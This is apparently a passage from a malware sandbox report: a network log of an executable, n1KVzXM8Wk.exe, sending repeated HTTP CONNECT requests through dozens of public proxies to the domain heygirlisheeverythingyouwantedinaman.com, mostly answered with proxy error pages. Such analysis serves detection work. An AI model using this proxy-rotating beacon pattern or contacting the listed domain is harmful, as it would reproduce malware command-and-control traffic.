                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:27.342762947 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:27.943981886 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1352192.168.2.453921162.240.22.169463956812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:26.835206985 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:27.342767000 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:27.943983078 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:29.147128105 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:31.334642887 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:33.647152901 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:35.944112062 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:40.293221951 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1353192.168.2.453472132.148.130.90276646812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:26.835558891 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1354192.168.2.452961104.238.111.10777576812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:26.835602999 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:27.365751982 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:27.866018057 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:28.866255045 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:30.680675983 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1355192.168.2.453925173.249.29.24391236812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:26.836086035 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:27.015252113 CET1286INHTTP/1.1 503 Service Unavailable
                                                                                                      Server: squid/3.5.27
                                                                                                      Mime-Version: 1.0
                                                                                                      Date: Fri, 23 Feb 2024 08:45:26 GMT
                                                                                                      Content-Type: text/html;charset=utf-8
                                                                                                      Content-Length: 3761
                                                                                                      X-Squid-Error: ERR_DNS_FAIL 0
                                                                                                      Vary: Accept-Language
                                                                                                      Content-Language: en
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 37 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 37 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 68 74 6d 6c 20 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 65 66 65 66 65 66 3b 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 09 63 6f 6c 6f 72 3a 20 23 31 65 31 65 31 65 3b 0a 7d 0a 0a 2f 2a 20 50 61 67 65 20 64 69 73 70 6c 61 79 65 64 20 74 69 74 6c 65 20 61 72 65 61 20 2a 2f 0a 23 74 69 74 6c 65 73 20 7b 0a 09 6d 61 72 67
                                                                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2017 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... /* * Copyright (C) 1996-2017 The Squid Software Foundation and contributors * * Squid software is distributed under GPLv2+ license and includes * contributions from numerous individuals and organizations. * Please see the COPYING and CONTRIBUTORS files for details. *//* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License*//* Page basics */* {font-family: verdana, sans-serif;}html body {margin: 0;padding: 0;background: #efefef;font-size: 12px;color: #1e1e1e;}/* Page displayed title area */#titles {marg


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1356192.168.2.453927213.136.79.17751896812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:26.838155031 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:27.365786076 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:27.975332975 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:29.178389072 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1357192.168.2.45381558.20.248.13990026812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:26.838773012 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:27.185271978 CET311INHTTP/1.1 400 Bad Request
                                                                                                      Server: nginx
                                                                                                      Date: Fri, 23 Feb 2024 08:45:26 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 166
                                                                                                      Connection: close
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1358192.168.2.453431161.97.160.158270106812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:26.852039099 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:29.865818977 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:32.866377115 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:38.865951061 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1359192.168.2.453945178.159.39.15381186812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:26.856739044 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:33.276948929 CET132INHTTP/1.1 503 Too many open connections
                                                                                                      Content-Type: text/plain
                                                                                                      Connection: close
                                                                                                      Data Raw: 4d 61 78 69 6d 75 6d 20 6e 75 6d 62 65 72 20 6f 66 20 6f 70 65 6e 20 63 6f 6e 6e 65 63 74 69 6f 6e 73 20 72 65 61 63 68 65 64 2e 0d 0a
                                                                                                      Data Ascii: Maximum number of open connections reached.


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1360192.168.2.453818115.239.234.4373026812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:26.877331972 CET113OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Feb 23, 2024 09:45:27.225328922 CET90INHTTP/1.1 200 OK
                                                                                                      Content-Type: application/json
                                                                                                      Connection: close
                                                                                                      Content-Length: 55


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1361192.168.2.45384247.243.205.131286812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:26.878058910 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:27.187470913 CET339INHTTP/1.1 500 Internal Server Error
                                                                                                      Server: nginx/1.20.1
                                                                                                      Date: Fri, 23 Feb 2024 08:45:27 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 177
                                                                                                      Connection: close
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>500 Internal Server Error</title></head><body><center><h1>500 Internal Server Error</h1></center><hr><center>nginx/1.20.1</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1362192.168.2.453831219.73.88.167806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:26.879049063 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:27.188195944 CET340INHTTP/1.1 400 Bad Request
                                                                                                      Server: nginx/1.12.2
                                                                                                      Date: Fri, 23 Feb 2024 08:45:27 GMT
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Content-Length: 173
                                                                                                      Connection: close
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.2</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1363192.168.2.45384427.111.83.20480806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:26.891880035 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1364192.168.2.45394945.138.87.23810806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:26.893990040 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1365192.168.2.453821210.211.113.36806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:26.895714998 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1366192.168.2.45387358.75.126.23541456812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:26.905613899 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1367192.168.2.453504167.99.123.158349136812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:26.929435015 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:29.943926096 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:33.037934065 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1368192.168.2.453975154.12.253.232165046812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:26.950036049 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:27.365777016 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:27.865901947 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:28.680526972 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:30.178359985 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1369192.168.2.454017104.16.108.234806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:26.981488943 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:27.069058895 CET316INHTTP/1.1 400 Bad Request
                                                                                                      Server: cloudflare
                                                                                                      Date: Fri, 23 Feb 2024 08:45:27 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 155
                                                                                                      Connection: close
                                                                                                      CF-RAY: -
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1370192.168.2.453904103.69.87.14231286812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:26.983480930 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:27.680824041 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:28.929383039 CET39INHTTP/1.1 200 Connection established


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1371192.168.2.45298745.136.197.13980806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:26.985224009 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:27.291969061 CET316INHTTP/1.1 400 Bad Request
                                                                                                      Server: cloudflare
                                                                                                      Date: Fri, 23 Feb 2024 08:45:27 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 155
                                                                                                      Connection: close
                                                                                                      CF-RAY: -
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1372192.168.2.454054104.20.233.70806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:26.998966932 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:27.086489916 CET316INHTTP/1.1 400 Bad Request
                                                                                                      Server: cloudflare
                                                                                                      Date: Fri, 23 Feb 2024 08:45:27 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 155
